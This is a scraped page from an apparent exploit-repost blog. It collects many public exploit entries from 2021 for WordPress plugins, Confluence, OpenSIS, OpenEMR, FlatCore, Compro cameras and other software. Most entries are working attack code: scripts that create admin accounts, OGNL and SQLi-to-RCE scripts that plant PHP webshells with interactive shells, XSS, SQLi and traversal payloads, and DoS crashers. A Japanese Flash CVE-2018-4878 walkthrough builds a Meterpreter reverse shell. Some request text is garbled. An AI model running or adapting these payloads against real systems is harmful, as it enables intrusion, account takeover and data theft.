Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863141614

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
# Date: 23-08-2021
# Exploit Author: Numan Rajkotiya
# Vendor Homepage: https://profilepress.net/
# Software Link: https://downloads.wordpress.org/plugin/wp-user-avatar.3.0.zip
# Version: [1] ProfilePress (Formerly WP User Avatar) 3.0 - 3.13
	   [2] WordPress 4.7 or higher
# Tested on: ProfilePress 3.0, Apache 2.4, and Windows Build 19043.928
# CVE : CVE-2021-34621

#!/bin/bash

# Exploit for WordPress Plugin ProfilePress 3.0 - 3.1.3 
# Change the name and password as per your requirement.

URL=$1

curl -X POST $URL"/wp-admin/admin-ajax.php" \
 -H "Content-Type: application/x-www-form-urlencoded" \
 -d "reg_username=numan" \
 -d "reg_email=pwned@numan.com" \
 -d "reg_password=numan" \
 -d "reg_password_present=true" \
 -d "wp_capabilities[administrator]=1" \
 -d "reg_first_name=pwned" \
 -d "reg_last_name=numan" \
 -d "action=pp_ajax_signup"
HireHackking 
# Exploit Title: Projectsend r1295 - 'name' Stored XSS 
# Date: 30.08.2021
# Exploit Author: Abdullah Kala
# Vendor Homepage: https://www.projectsend.org/
# Software Link: https://www.projectsend.org/download/387/
# Version: r1295
# Tested on: Ubuntu 18.04 
# Description: Firstly add client group. After uploading the file from the user with any role, payload is written in the "title" part of the redirected page, add group your created and save. For users with the "System Administrator" role, xss is triggered on the "Dashboard" page.

POST /projectsend/files-edit.php?ids=1 HTTP/1.1
Host: 10.10.10.55
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------36890316955266305672634658708
Content-Length: 1323
Origin: http://10.10.10.55
Connection: close
Referer: http://10.10.10.55/projectsend/files-edit.php?ids=5
Cookie: menu_contracted=false; PHPSESSID=kvip7m24ib2d062hcaut3fbr2o
Upgrade-Insecure-Requests: 1

-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="csrf_token"

f53a148f0f952cb00c7e7edc63be5a3efd911d5c27de15eb78c7323a6d7b3c02
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][id]"

1
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][original]"

test.png
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][file]"

1630247451-f2d3f09150beb76c7f2c83dc27732a0b23718875-kudur.png
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][name]"

<script>alert(1)</script>
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][description]"

test
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][expiry_date]"

28-09-2021
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="file[1][assignments][groups][]"

1
-----------------------------36890316955266305672634658708
Content-Disposition: form-data; name="save"


-----------------------------36890316955266305672634658708--
HireHackking 
# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)
# Date: 01/09/2021
# Exploit Author: h3v0x
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: All < 7.12.x versions before 7.12.5
# Tested on: Linux Distros 
# CVE : CVE-2021-26084

#!/usr/bin/python3

# References: 
# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

import requests
from bs4 import BeautifulSoup
import optparse

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://confluencexxx.com")
parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x")

options, args = parser.parse_args()
session = requests.Session()

url_vuln = options.url
endpoint = options.path

if not options.url or not options.path:

    print('[+] Specify an url target')
    print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')
    print('[+] Example help usage: exploit.py -h')
    exit()


def banner():

    print('---------------------------------------------------------------')
    print('[-] Confluence Server Webwork OGNL injection')
    print('[-] CVE-2021-26084')
    print('[-] https://github.com/h3v0x')
    print('--------------------------------------------------------------- \n')


def cmdExec():

    while True:
        cmd = input('> ')
        xpl_url = url_vuln + endpoint
        xpl_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded", "Accept-Encoding": "gzip, deflate"}
        xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
        rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)

        soup = BeautifulSoup(rawHTML.text, 'html.parser')
        queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']
        print(queryStringValue)


banner()
cmdExec()
HireHackking 
# Exploit Title: Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated)
# Date: 19.08.2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Linux

import requests
import random
import string
import json
from bs4 import BeautifulSoup

url = input("TARGET = ")

if not url.startswith('http://') and not url.startswith('https://'):
    url = "http://" + url
if not url.endswith('/'):
    url = url + "/"

payload= "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"

let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))


session = requests.session()

print("Login Bypass\n")

request_url = url + "/classes/Login.php?f=login"
post_data = {"username": "admin' or '1'='1'#", "password": ""}
bypassUser = session.post(request_url, data=post_data)
data = json.loads(bypassUser.text)
status = data["status"]
if status == "success":

    print("Finding first driver\n")

    getHTML = session.get(url + "admin/?page=drivers")
    getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser')
    findFirstDriverID = getHTMLParser.find("a", {"class": "delete_data"}).get("data-id")

    print("Found firs driver ID : " + findFirstDriverID)

    print("\nFinding path")

    findPath = session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+'\'')
    findPath = findPath.text[findPath.text.index("<b>Warning</b>:  ")+17:findPath.text.index("</b> on line ")]
    findPath = findPath[findPath.index("<b>")+3:len(findPath)]

    parser = findPath.split('\\')
    parser.pop()
    findPath = ""
    for find in parser:
        findPath += find + "/"

    print("\nFound Path : " + findPath)
    shellPath = findPath[findPath.index("admin/"):len(findPath)]

    SQLtoRCE = "' LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
    SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")
    SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())

    print("\n\nShell Uploading...")
    session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+SQLtoRCE)

    print("\nShell Path : " + url+shellPath+shellname+".php")
    shellOutput = session.get(url+shellPath+shellname+".php?tago=whoami")
    print("\n\nShell Output : "+shellOutput.text)

else:
    print("No bypass user")
HireHackking

OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection

HACKER · %s · %s

# Exploit Title: OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection # Date: 09/01/2021 # Exploit Author: Eric Salario # Vendor Homepage: http://www.os4ed.com/ # Software Link: https://opensis.com/download # Version: 8.0 # Tested on: Windows, Linux A SQL injection vulnerability exists in the Take Attendance functionality of OS4Ed's OpenSIS 8.0. allows an attacker to inject their own SQL query. The cp_id_miss_attn parameter from TakeAttendance.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request as a user with access to "Take Attendance" functionality to trigger this vulnerability. Steps to reproduce: 1. Login as "Teacher" and navigate to "Attendance" then "Take Attendance". Capture the request on a web proxy such as BurpSuite Or just navigate to the URL: http://localhost/Ajax.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=27&cpv_id_miss_attn=23&ajax=true Vulnerable parameter: cp_id_miss_attn SQLi payload: r AND (SELECT 1670 FROM (SELECT(SLEEP(10)))VSpq) URL with the payload: http://localhost/Ajax.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=r AND (SELECT 1670 FROM (SELECT(SLEEP(10)))VSpq)&cpv_id_miss_attn=23&ajax=true 2. The page should load depends on the sleep You can use manual queries to dump database information or use sqlmap. PoC: https://youtu.be/GGHiPvdPRas
HireHackking

WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection

HACKER · %s · %s

# Exploit Title: WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection # Date: 29/08/2021 # Exploit Author: Niraj Mahajan # Software Link: https://wordpress.org/plugins/invoicing/ # Version: 2.4.6 # Tested on Windows *Steps to Reproduce:* 1. Install Wordpress 5.8 2. Install and Activate "WordPress Payments Plugin | GetPaid" Version 2.4.6 3. Navigate to GetPaid > Payment Forms 4. Click on "Add New" in the Payment Form page 5. Add a title and Click on Billing Email 6. You can see the "Help Text" field on the left hand side. 7. Add the below HTML code into the "Help Text" Field. <img src=" https://www.pandasecurity.com/en/mediacenter/src/uploads/2019/07/pandasecurity-How-do-hackers-pick-their-targets.jpg" height="200px" width="200px"> 8. You will observe that the HTML code has successfully got stored into the database and executed successfully and we are getting an Image at the right hand side.
HireHackking
# Exploit Title: Compro Technology IP Camera - RTSP stream disclosure (Unauthenticated) # Date: 2021-09-30 # Exploit Author: icekam,xiao13,Rainbow,tfsec # Software Link: http://www.comprotech.com.hk/ # Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 # CVE : CVE-2021-40379 Some devices have unauthorized access to rstp, which can lead to the leakage of surveillance video stream information. Payload:rstp://.../medias2 please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
HireHackking
# Exploit Title: Compro Technology IP Camera - ' mjpegStreamer.cgi' Screenshot Disclosure # Date: 2021-09-30 # Exploit Author: icekam,xiao13,Rainbow,tfsec # Software Link: http://www.comprotech.com.hk/ # Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 # CVE : CVE-2021-40382 There is an unauthorized access vulnerability, which can lead to unauthorized access to camera video screenshots. Payload: /mjpegStreamer.cgi please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
HireHackking

Compro Technology IP Camera - 'Multiple' Credential Disclosure

HACKER · %s · %s

# Exploit Title: Compro Technology IP Camera - 'Multiple' Credential Disclosure # Date: 2021-09-30 # Exploit Author: icekam,xiao13,Rainbow,tfsec # Software Link: http://www.comprotech.com.hk/ # Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 # CVE : CVE-2021-40380 There are unauthorized access vulnerabilities, which can lead to the disclosure of device administrator usernames and passwords or rstp usernames and passwords. Payload: /cgi-bin/cameralist/cameralist.cgi /cgi-bin/cameralist/setcamera.cgi?id=* please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
HireHackking

OpenSIS 8.0 'modname' - Directory Traversal

HACKER · %s · %s

# Exploit Title: OpenSIS 8.0 'modname' - Directory/Path Traversal # Date: 09-02-2021 # Exploit Author: Eric Salario # Vendor Homepage: http://www.os4ed.com/ # Software Link: https://opensis.com/download # Version: 8.0 # Tested on: Windows, Linux # CVE: CVE-2021-40651 The 'modname' parameter in the 'Modules.php' is vulnerable to local file inclusion vulnerability. This vulnerability can be exploited to expose sensitive information from arbitrary files in the underlying system. To exploit the vulnerability, someone must login as the "Parent" user, navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php. The 'modname' parameter and requests the Portal.php's contents. By going back a few directory using '..%2f' decoded as '../' it was possible to disclose arbitrary file from the server's filesystem as long as the application has access to the file. 1. Login as "Parent" 2. Open a web proxy such as BurpSuite and capture the requests 3. Navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= 4. Check the response PoC: https://youtu.be/wFwlbXANRCo
HireHackking
# Exploit Title: WordPress Plugin Duplicate Page 4.4.1 - Stored Cross-Site Scripting (XSS) # Date: 02/09/2021 # Exploit Author: Nikhil Kapoor # Software Link: https://wordpress.org/plugins/duplicate-page/ # Version: 4.4.1 # Category: Web Application # Tested on Windows How to Reproduce this Vulnerability: 1. Install WordPress 5.7.2 2. Install and activate Duplicate Page 3. Navigate to Settings >> Duplicate Page and enter the XSS payload into the Duplicate Post Suffix input field. 4. Click Save Changes. 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up. 6. Payload Used: "><svg/onload=confirm(/XSS/)>
HireHackking

OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)

HACKER · %s · %s

# Exploit Title: OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR) # Date: 31/08/2021 # Exploit Author: Allen Enosh Upputori # Vendor Homepage: https://www.open-emr.org # Software Link: https://www.open-emr.org/wiki/index.php/OpenEMR_Downloads # Version: 6.0.0 # Tested on: Linux # CVE : CVE-2021-40352 How to Reproduce this Vulnerability: 1. Install Openemr 6.0.0 2. Login as an Physician 3. Open Messages 4. Click Print 5. Change the existing "noteid=" value to another number This will reveal everybodys messages Incuding Admin only Messages
HireHackking
# Exploit Title: Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR) # Date: 2021-09-05 # Exploit Author: sudoninja # Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip # Version: 1.0 # Tested on: Windows 10 - XAMPP Server # Vulnerable page : http://localhost/buspassms/admin/view-pass-detail.php?viewid=4 # Vulnerable paramater : The viewid paramater is Vulnerable to Insecure direct object references (IDOR) # Proof Of Concept : # 1 . Download And install [ bus-pass-management-system ] # 2 . Go to /admin/index.php and Enter Username & Password # 3 . Navigate to search >> search pass # 4 . Click on the view and enter the change viewid into the Url Use : http://localhost/buspassms/admin/view-pass-detail.php?viewid=[change id]
HireHackking

FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)

HACKER · %s · %s

# Exploit Title: FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated) # Date: 04/10/2021 # Exploit Author: Mason Soroka-Gill @sgizoid # Vendor Homepage: https://flatcore.org/ # Software Link: https://github.com/flatCore/flatCore-CMS/archive/refs/tags/v2.0.7.tar.gz # Version: 2.0.7 # Tested on: Ubuntu Server 21.04 # CVE: CVE-2021-39608 # References: # - https://github.com/flatCore/flatCore-CMS/issues/52 #!/usr/bin/env python3 import sys import requests from lxml import html from urllib.parse import urlencode if len(sys.argv) != 4: print(f"Usage: {sys.argv[0]} 'http(s)://TARGET' 'USERNAME' 'PASSWORD'") exit(1) TARGET = sys.argv[1] USERNAME = sys.argv[2] PASSWORD = sys.argv[3] # attempt to log in resp = requests.post(f"{TARGET}/index.php?p=1", data={ "login_name":f"{USERNAME}", "login_psw":f"{PASSWORD}", "login":"Anmelden"}) # grab the PHP session ID PHPSESSID = resp.headers['Set-Cookie'].split(";")[0] # validate credentials worked resp = requests.get(f"{TARGET}/acp/acp.php?tn=addons", headers={"Cookie":PHPSESSID}) if resp.status_code != 200: print("Invalid credentials") exit(1) else: print("Logged in") # grab the csrf token for the script upload csrf_token = html.document_fromstring(resp.text).xpath('//form/input[7]')[0].value # post the shell to the host resp = requests.post(f"{TARGET}/acp/core/files.upload-script.php", data={"upload_type":"plugin", "csrf_token":csrf_token}, # the csrf token files={"file":("sgizoid.php", "<?php echo shell_exec($_GET['sg']); ?>")}, # the webshell headers={"Cookie":PHPSESSID}) # the php session id # pretend to be a shell while True: command = input("$ ") if command.lower() == "exit" or command.lower() == "q": break resp = requests.get(f"{TARGET}/upload/plugins/sgizoid.php?{urlencode({'sg':command})}") # verify payload succeeded if resp.status_code == 200: print(resp.text) else: print("Error: Something went wrong, maybe the shell didn't work?") break # delete the webshell resp = requests.get(f"{TARGET}/acp/acp.php?tn=moduls&sub=u&dir=plugins&del=sgizoid.php", headers={"Cookie":PHPSESSID}) if resp.status_code == 200: print("Cleaned up webshell") # clean up the session resp = requests.get(f"{TARGET}/index.php?goto=logout", headers={"Cookie":PHPSESSID}) if resp.status_code == 200: print("Logged out") exit(0)
HireHackking

SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC)

HACKER · %s · %s

# Exploit Title: SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service # Date: 9/5/2021 # Exploit Author: Eric Salario # Vendor Homepage: https://www.smartftp.com/en-us/ # Software Link: https://www.smartftp.com/en-us/download # Version: 10.0.2909.0 (32 and 64 bit) # Tested on: Microsoft Windows 10 32 bit and 64 bit ========================================================================= buffer = "//" buffer += "A" * 423 f = open ("path.txt", "w") f.write(buffer) f.close() 1. Run the python script 2. Open SmartFTP > New Connection > FTPS (explicit) 3. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255) 4. In Path, copy paste the content of the "path.txt" generated by the python script 5. Click "OK" 6. SmartFTP client crashes ======================================================================= 1. Open SmartFTP > New Connection > FTPS (explicit) 2. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255) 3. In Path, type slash ("/") and click "OK" 4. The app should return "Error 0x80072741" 5. In the path's search bar, replace slash ("/") with whatever and press enter 6. SmartFTP client crashes ======================================================================= 1. Open SmartFTP 2. In the "New Connection" bar, clear the history (dropdown to the right of the bar) 3. Once the history is empty, click the bar and type anything 3. SmartFTP client crashes
HireHackking

Dolibarr ERP 14.0.1 - Privilege Escalation

HACKER · %s · %s

# Exploit Title: Dolibarr ERP/CRM 14.0.1 - Privilege Escalation # Date: April 8, 2021 # Exploit Author: Vishwaraj101 # Vendor Homepage: https://www.dolibarr.org/ # Affected Version: <= 14.0.1 # Patch: https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d *Summary:* Using the below chain of issues attacker can compromise any dolibarr user account including the admin. *Poc:* 1. Visit https://example.com/api/index.php/login?login=demo&password=demo try to login with a test user with 0 permissons or less permissions. 2. We will receive an api token in return. 3. Next we need to fetch the user id of the user whose account we want to own. *First we need to fetch the user id of the admin user using the below api.* *Request1:* GET /api/index.php/users/login/admin HTTP/1.1Host: preview2.dolibarr.ohttps://preview2.dolibarr.org/api/index.php/users/login/adminrg User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@tqn9xk6rn6fq8x9ijbmpouosrjxan3srh.burpcollaborator.netAccept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflateDOLAPIKEY: test1337Connection: close *This will return the user details using the username. Now update the victim user account via below api (include the json body received from the previous request1 and replace the email id from below json to the attacker controlled email)* *Request2:*PUT /api/index.php/users/*12* HTTP/1.1 Host: preview2.dolibarr.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@67bmexn44jw3paqv0o3257558wen5mwal.burpcollaborator.netAccept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDOLAPIKEY: test1337Origin: https://preview2.dolibarr.orgConnection: closeReferer: http://5z5l6wf3wio2h9iusnv1x6x40v6mxkw8l.burpcollaborator.net/refContent-Length: 3221 { "id": "12", "statut": "1", "employee": "1", "civility_code": null, "gender": "woman", "birth": 495583200, "email": "*attacker@example.com <attacker@example.com>*", "personal_email": "", "socialnetworks": { "facebook": "", "skype": "", "twitter": "", "linkedin": "", "instagram": "", "snapchat": "", "googleplus": "", "youtube": "", "whatsapp": "", "tumblr": "", "vero": "", "viadeo": "", "slack": "", "xing": "", "meetup": "", "pinterest": "", "flickr": "", "500px": "", "giphy": "", "gifycat": "", "dailymotion": "", "vimeo": "", "periscope": "", "twitch": "", "discord": "", "wikipedia": "", "reddit": "", "quora": "", "tripadvisor": "", "mastodon": "", "diaspora": "", "viber": "" }, "job": "Admin Technical", "signature": "", "address": "", "zip": "", "town": "", "state_id": null, "state_code": null, "state": null, "office_phone": "", "office_fax": "", "user_mobile": "", "personal_mobile": "", "admin": "1", "login": "admin", "entity": "0", "datec": 1507187386, "datem": 1617819214, "socid": null, "contact_id": null, "fk_member": null, "fk_user": "11", "fk_user_expense_validator": null, "fk_user_holiday_validator": null, "clicktodial_url": null, "clicktodial_login": null, "clicktodial_poste": null, "datelastlogin": 1617816891, "datepreviouslogin": 1617815935, "datestartvalidity": "", "dateendvalidity": "", "photo": "com.jpg", "lang": "fr_FR", "rights": { "user": { "user": {}, "self": {} } }, "conf": {}, "users": [], "parentof": null, "accountancy_code": "", "weeklyhours": "39.00000000", "color": "", "dateemployment": "", "dateemploymentend": "", "default_c_exp_tax_cat": null, "default_range": null, "fk_warehouse": null, "import_key": null, "array_options": [], "array_languages": null, "linkedObjectsIds": null, "canvas": null, "fk_project": null, "contact": null, "thirdparty": null, "user": null, "origin": null, "origin_id": null, "ref": "12", "ref_ext": null, "status": null, "country": null, "country_id": null, "country_code": "", "region_id": null, "barcode_type": null, "barcode_type_code": null, "barcode_type_label": null, "barcode_type_coder": null, "mode_reglement_id": null, "cond_reglement_id": null, "demand_reason_id": null, "transport_mode_id": null, "cond_reglement": null, "modelpdf": null, "last_main_doc": null, "fk_bank": null, "fk_account": null, "note_public": "", "note_private": "", "note": "", "name": null, "lastname": "Adminson", "firstname": "Alice", "civility_id": null, "date_creation": null, "date_validation": null, "date_modification": null, "specimen": 0, "alreadypaid": null, "liste_limit": 0 } This will reset the admin email account to the attacker controlled email account, now using the password reset feature attacker will reset the admin account password and will gain access to the admin account.
HireHackking

Telegram Desktop 2.9.2 - Denial of Service (PoC)

HACKER · %s · %s

# Exploit Title: Telegram Desktop 2.9.2 - Denial of Service (PoC) # Exploit Author: Aryan Chehreghani # Date: 2021-08-30 # Vendor Homepage: https://telegram.org # Software Link: https://telegram.org/dl/desktop/win64 # Tested Version: 2.9.2 x64 # Tested on OS: Windows 10 Enterprise # [ About App ] #Telegram is a messaging app with a focus on speed and security, it’s super-fast, simple and free, #You can use Telegram on all your devices at the same time — your messages sync seamlessly across any number of your phones, tablets or computers. #Telegram has over 500 million monthly active users and is one of the 10 most downloaded apps in the world. #With Telegram, you can send messages, photos, videos and files of any type (doc, zip, mp3, etc), as well as create groups for up to 200,000 people or channels for broadcasting to unlimited audiences. #You can write to your phone contacts and find people by their usernames. As a result, #Telegram is like SMS and email combined — and can take care of all your personal or business messaging needs, #Telegram is support end-to-end encrypted voice and video calls, as well as voice chats in groups for thousands of participants. # [ POC ] # 1.Run the python script, it will create a new file "output.txt" # 2.Run Telegram Desktop and go to "Saved Messages" # 3.Copy the content of the file "output.txt" # 4.Paste the content of dos.txt into the "Write a message..." # 5.Crashed ;) #!/usr/bin/env python buffer = "\x41" * 9000000 try: f=open("output.txt","w") print("[!] Creating %s bytes DOS payload...." %len(buffer)) f.write(buffer) f.close() print("[!] File Created !") except: print("File cannot be created")
HireHackking
# Exploit Title: Compro Technology IP Camera - 'killps.cgi' Denial-of-Service (DoS) # Date: 2021-09-30 # Exploit Author: icekam,xiao13,Rainbow,tfsec # Software Link: http://www.comprotech.com.hk/ # Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 # CVE : CVE-2021-40378 There is a backdoor prefabricated in the device in this path. Accessing the file through the browser after logging in will cause the device to delete all data (including the data of the camera itself). Payload:Visit this page after logging in /cgi-bin/support/killps.cgi please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
HireHackking
# Exploit Title: Compro Technology IP Camera - ' index_MJpeg.cgi' Stream Disclosure # Date: 2021-09-30 # Exploit Author: icekam,xiao13,Rainbow,tfsec # Software Link: http://www.comprotech.com.hk/ # Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 # CVE : CVE-2021-40381 Has an unauthorized access vulnerability, which can lead to unauthorized access to the camera video page. Payload: /cgi-bin/view/index_MJpeg.cgi please refer to: https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
HireHackking

タイトル:Flash 0Day CVE-2018-4878脆弱性の再発

HACKER · %s · %s

0x01はじめに
Adobeは、2018年2月1日にセキュリティ通知を発行しました。
https://helpx.adobe.com/security/products/flash-player/apsa18-01.html
発表は、新しいFlash 0dayの脆弱性(CVE-2018-4878)が野生で悪用され、Windowsユーザーに対するターゲット攻撃を開始できると述べました。攻撃者は、ユーザーにMicrosoft Office Documents、Webページ、スパムメールなどを開くように誘導できます。悪意のあるフラッシュコードファイルを含む。

0x02脆弱性の影響
フラッシュプレーヤーの現在の最新バージョン28.0.0.137およびすべての以前のバージョン

0x03脆弱性の再発
環境テスト:攻撃マシン:Kaliターゲットマシン:Win7x64 +IE8.0 +Flash Player28.0.0.1371。 CVE-2018-4878の足音をダウンロードします
wget https://raw.githubusercontent.com/backlion/demo/master/cve-2018-4878.rar
2。圧縮されたファイルを減圧した後、CVE-2018-4878.pyおよびexploit.swfを見ることができます

3. CVE-2018-4878.pyを変更する必要があります。元の著者は、コード内の雄弁な変数をtrueに変更しました。正しいものは次のように変更する必要があります:stageless=false。元の著者のExpアドレスを添付してください:https://github.com/anbai-inc/cve-2018-4878.git

4.第二に、元の電卓のシェルコードを変更して交換する必要があります。

5。KALIの下でMSFのShellCode:を生成します
MSFVENOM -PWINDOWS/METERPRETER/REVERSE_TCPLHOST=あなたのホストlport=Your Port -FPYTHONSHELLCODE.TXT

6. CVE-2018-4878.pyで生成されたシェルコードをShellDoceに置き換えます

7。CVE-2018-4878を実行します。ここでは、悪意のあるexploit.swfを生成するには、index.htmlと同じディレクトリにある必要があります

8。デモンストレーションのために、index.htmlとexploit.swfをターゲットマシンに一緒にコピーして、IEブラウザで開きました(Webサーバーを構築してアドレスにアクセスすることにより、Webディレクトリにindex.htmlとexploit.swfを配置することもできます)。

9.MSFの下のリスニング設定を設定します
MSF使用
Exploit/Multi/Handler
MSFエクスプロイト(ハンドラー)
PayloadWindows/MeterPreter/Reverse_tcpを設定します
MSFエクスプロイト(ハンドラー)
LHOST 10.0.0.217を設定します
MSFエクスプロイト(ハンドラー)
LPORT 443を設定します
MSFエクスプロイト(ハンドラー)
エクスプロイト

10。ターゲットの悪意のあるindex.htmlページが開かれると、リバウンドシェルをトリガーできます。

0x04
脆弱性修理構造は、公式ウェブサイトを通じて最新バージョンにアップグレードされます
https://get.adobe.com/cn/flashplayer/
HireHackking

Remote Mouse 4.002 - Unquoted Service Path

HACKER · %s · %s

# Exploit Title: Remote Mouse 4.002 - Unquoted Service Path # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Date: 03.09.2021 # Software Link: https://www.remotemouse.net/downloads/RemoteMouse.exe # Vendor Homepage: https://www.remotemouse.net/ # Version: Remote Mouse 3.008 & 4.002 # Tested on: Windows 10 # Proof of Concept: C:\Users\death>sc qc RemoteMouseService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: RemoteMouseService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Remote Mouse\RemoteMouseService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : RemoteMouseService DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ RemoteMouseService RemoteMouseService C:\Program Files (x86)\Remote Mouse\RemoteMouseService.exe Auto
HireHackking

WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)

HACKER · %s · %s

